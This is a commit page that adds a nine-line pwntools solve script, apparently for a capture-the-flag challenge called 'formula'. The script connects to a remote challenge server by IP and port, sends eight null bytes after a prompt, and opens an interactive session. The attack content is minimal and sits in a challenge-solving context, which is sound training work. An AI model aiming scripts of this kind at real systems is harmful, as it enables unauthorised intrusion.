laokoon
This commit is contained in:
9
LaokoonHaxorcist/pwn_formula/solve.py
Normal file
9
LaokoonHaxorcist/pwn_formula/solve.py
Normal file
@@ -0,0 +1,9 @@
|
||||
from pwn import *
|
||||
|
||||
|
||||
# io = process("./formula")
|
||||
|
||||
io = remote("94.237.59.206", 35564)
|
||||
io.recvuntil("[Marty]:")
|
||||
io.send(b'\x00' *8)
|
||||
io.interactive()
|
||||
Reference in New Issue
Block a user